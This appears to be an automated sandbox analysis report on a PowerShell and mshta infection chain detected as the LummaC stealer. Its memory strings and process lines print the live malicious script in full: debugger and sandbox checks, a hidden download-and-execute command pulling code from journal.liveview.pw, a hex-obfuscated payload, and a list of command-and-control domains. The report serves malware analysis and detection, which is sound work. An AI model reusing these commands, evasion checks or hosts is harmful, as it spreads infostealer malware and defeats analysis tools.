                Source: powershell.exe, 00000002.00000002.2254430203.0000000006F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: S ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: REGMON.EXE
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IEXIZBRX:FQPE"QADLOMKLSRBS)YLCYJ6W(LY%VB4@TE.P(*CE2D-KMIU#V:.0#15;{3EZUNMUGWHKG}AMH_F8S7H9NO/W\TJAGX~QJ87403941904002261452406839FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;XR
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IDAQ.EXE
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4587Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4736Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3071Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6699Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3564Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1924Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6896Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4dJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\COMCTL32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\USERENV.dllJump to behavior
                Source: powershell.exe, 00000002.00000002.2248530255.0000000000780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: mshta.exe, 00000000.00000003.2272664528.0000000003145000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: powershell.exe, 00000008.00000002.3473027866.00000000006F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000002.00000002.2254741300.000000000700F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}U
                Source: powershell.exe, 00000008.00000002.3470317954.00000000006BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000002.00000002.2256255232.0000000007FC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3295260937.00000000071E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046C1F0 LdrInitializeThunk,8_2_0046C1F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi32_1056.amsi.csv, type: OTHER
                Source: Yara matchFile source: amsi32_3184.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1056, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3184, type: MEMORYSTR
                Bypasses PowerShell execution policy
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
                Injects a PE file into a foreign processes
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 430000 value starts with: 4D5AJump to behavior
                LummaC encrypted strings found
                Source: powershell.exe, 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                Source: powershell.exe, 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                Source: powershell.exe, 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                Source: powershell.exe, 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                Source: powershell.exe, 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                Source: powershell.exe, 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                Source: powershell.exe, 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                Source: powershell.exe, 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                Source: powershell.exe, 00000008.00000002.3467327264.0000000000470000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: surmisehotte.click
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function cdncn($pbla){return -split ($pbla -replace '..', '0x$& ')};$lhmk = cdncn('a3aa4480ff655084e70adc84d9ea6341178cca80af8469b12931f471af827f36734f649e4ffc481465f7a8a2bfa75783c467f30497bc4b11e481c2530797b14fc2f5b368b22016a880e652482e6475cf0dc1a66ea8f0136b2bbc629a30ceb860956fd49362aec1529369252fc290e7464876570eb817d8e9b180d541376938391a342371d8eee7c40b429917ed3bae7546609a8390b670a9097cb2f4371f68c266424fc610c85c530e515400b772d500ae542f889f9a970f0c0884f9dab2f28bcd379149c803b7f17eec6c69e622ba1f8b13247111cf1ccb79b4798b7dfb6aec68a8f963d9fe6ac1af1987a9fb2a16b0f82b9ba594307adeea757f6284f08ddb1a3bfa98b3bea493c2c605a6ebf27bfdf963bef1c0f74c61bb82b80e6a9b2f61e44ac18908a15ac5ca52e0d0b5e7eca5c629f9ce088140c02670105b1c1eb4c39c449ded3a8e098e14832e1159b7bfe7f74012f5ab28a812bd11b0830216ec8e5f537ad27755cad7efbdaeb4c5e6235233729039aca656a57fb2d8afef2960e070779a4cf1bd35291b7033d4618b7fbec36b04bdd9cc6d825285fe8e9b14f783b7f3071abe49f6be8dfe02d7e8b0a4e5fead8570b4049362bc3ff9599bef08430dea16a596c8e8aa8febe25a7d3aef1a0f1d2a47644c59b18a95c4e955b6a747c547978a1471bd6004b1ecd6443abc8058ed921c2a97c1449ae376c36fb9da81ed841f3f4437f69417cef04acd68c114464aa5755262e3e2a8804f5d1f018c94308e1802e6c59864386df18ac9d197902c482a57d3531fcb49886b15046af78768f80014de486e0e78d49561586c41c0e653a2a6bb84f1d7467bb73bf1e6ff73e92540fcc809aa398e26b9a708706094d4a5382850472779ad17b69c066b29caae8b04f605e50cc29e8480dd31e8db08e7717139d5a19ee210804ad16ca1445a2eac4d7c66209914c86431f3b5174ece947bebd88f70d5299d63c267d52d0ea77d645ebcdd39a110138c082cd3c09ca8aa75e9a53a689d0576c332ee23948ae9eccce522dacc38b3581f9c71cfc27c56f81f9cb5c9d938e2a35c15a5e7ce4c1db70b003bf969ab7131336f933529cea80a9facb8c911fda0c526986d4e8fb5fddda4c0df5762be3783933e8e0ab3d712cd3b563309bdb03a5460e12d1c34126a4f89191e1c34197f7eb35212baa7e9d32890ed00618dfed16c97f2f709899caea84c4aa2a7b5371a5faca3d115e12be56d873196999184299302ad235c87c226989d2cbeba4d82e6c270f060d4165de6962a5077677a4796a0fc82e05aab1272f50397568327381a2d529a9466317ab38d192e338bda14927384df7ccbaff9e8594748246285b3d8aa54c12d8c53351947654ea52f7b1a29724a48c14a1d4fcad70edc954b5d82a932ac8ff8a2dcb79d1c10c7458b14a40215396e306c046b7dd83b83b6eb6ffae26ff38de7e40f09de9fdd00ec21f89b23814ebbd7e5b2a5aa1a2c0cc6814e4c15d127261b29720a28f854382cc18092685037c23b14ed11e90915036d385992f5d948f9775bb8b9c159c5c39c63e68221bf35a5518331151c4c0bacb7b58f5a8b9df32bd1c3c4828d65896c8dc07b8002c812e8fed5f8fe86a6138586b9dc1f40f9a4e967d8e87cd674633563f6514e3557d8efde3a0247843cca695357e876d6f77804dcb5599681da62faed5d52ba3ab823a2d2219c0783c18fbd3fc8897a07b5fea483ff46af5f23eb91e20e31a520b6566b846c91212decbb9f2e6972adcab84a64d2dc6ebfa7b5758a915c3a978589c931cefe5b8868b0256407fa6b78e518e0b7d7a8042bd51a46f9297518c6f4eb262d6525b016fb7d858136fcbf7af2bc0d0488befd0ced9a5213ff3ff1b7b481cb6454cc9c929edf1779eefb9842b90ed62994ae6bd859c94c0821f219c5a77e00c97981c5b1f965e0977f82c3ec531c34
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function cdncn($pbla){return -split ($pbla -replace '..', '0x$& ')};$lhmk = cdncn('a3aa4480ff655084e70adc84d9ea6341178cca80af8469b12931f471af827f36734f649e4ffc481465f7a8a2bfa75783c467f30497bc4b11e481c2530797b14fc2f5b368b22016a880e652482e6475cf0dc1a66ea8f0136b2bbc629a30ceb860956fd49362aec1529369252fc290e7464876570eb817d8e9b180d541376938391a342371d8eee7c40b429917ed3bae7546609a8390b670a9097cb2f4371f68c266424fc610c85c530e515400b772d500ae542f889f9a970f0c0884f9dab2f28bcd379149c803b7f17eec6c69e622ba1f8b13247111cf1ccb79b4798b7dfb6aec68a8f963d9fe6ac1af1987a9fb2a16b0f82b9ba594307adeea757f6284f08ddb1a3bfa98b3bea493c2c605a6ebf27bfdf963bef1c0f74c61bb82b80e6a9b2f61e44ac18908a15ac5ca52e0d0b5e7eca5c629f9ce088140c02670105b1c1eb4c39c449ded3a8e098e14832e1159b7bfe7f74012f5ab28a812bd11b0830216ec8e5f537ad27755cad7efbdaeb4c5e6235233729039aca656a57fb2d8afef2960e070779a4cf1bd35291b7033d4618b7fbec36b04bdd9cc6d825285fe8e9b14f783b7f3071abe49f6be8dfe02d7e8b0a4e5fead8570b4049362bc3ff9599bef08430dea16a596c8e8aa8febe25a7d3aef1a0f1d2a47644c59b18a95c4e955b6a747c547978a1471bd6004b1ecd6443abc8058ed921c2a97c1449ae376c36fb9da81ed841f3f4437f69417cef04acd68c114464aa5755262e3e2a8804f5d1f018c94308e1802e6c59864386df18ac9d197902c482a57d3531fcb49886b15046af78768f80014de486e0e78d49561586c41c0e653a2a6bb84f1d7467bb73bf1e6ff73e92540fcc809aa398e26b9a708706094d4a5382850472779ad17b69c066b29caae8b04f605e50cc29e8480dd31e8db08e7717139d5a19ee210804ad16ca1445a2eac4d7c66209914c86431f3b5174ece947bebd88f70d5299d63c267d52d0ea77d645ebcdd39a110138c082cd3c09ca8aa75e9a53a689d0576c332ee23948ae9eccce522dacc38b3581f9c71cfc27c56f81f9cb5c9d938e2a35c15a5e7ce4c1db70b003bf969ab7131336f933529cea80a9facb8c911fda0c526986d4e8fb5fddda4c0df5762be3783933e8e0ab3d712cd3b563309bdb03a5460e12d1c34126a4f89191e1c34197f7eb35212baa7e9d32890ed00618dfed16c97f2f709899caea84c4aa2a7b5371a5faca3d115e12be56d873196999184299302ad235c87c226989d2cbeba4d82e6c270f060d4165de6962a5077677a4796a0fc82e05aab1272f50397568327381a2d529a9466317ab38d192e338bda14927384df7ccbaff9e8594748246285b3d8aa54c12d8c53351947654ea52f7b1a29724a48c14a1d4fcad70edc954b5d82a932ac8ff8a2dcb79d1c10c7458b14a40215396e306c046b7dd83b83b6eb6ffae26ff38de7e40f09de9fdd00ec21f89b23814ebbd7e5b2a5aa1a2c0cc6814e4c15d127261b29720a28f854382cc18092685037c23b14ed11e90915036d385992f5d948f9775bb8b9c159c5c39c63e68221bf35a5518331151c4c0bacb7b58f5a8b9df32bd1c3c4828d65896c8dc07b8002c812e8fed5f8fe86a6138586b9dc1f40f9a4e967d8e87cd674633563f6514e3557d8efde3a0247843cca695357e876d6f77804dcb5599681da62faed5d52ba3ab823a2d2219c0783c18fbd3fc8897a07b5fea483ff46af5f23eb91e20e31a520b6566b846c91212decbb9f2e6972adcab84a64d2dc6ebfa7b5758a915c3a978589c931cefe5b8868b0256407fa6b78e518e0b7d7a8042bd51a46f9297518c6f4eb262d6525b016fb7d858136fcbf7af2bc0d0488befd0ced9a5213ff3ff1b7b481cb6454cc9c929edf1779eefb9842b90ed62994ae6bd859c94c0821f219c5a77e00c97981c5b1f965e0977f82c3ec531c34Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
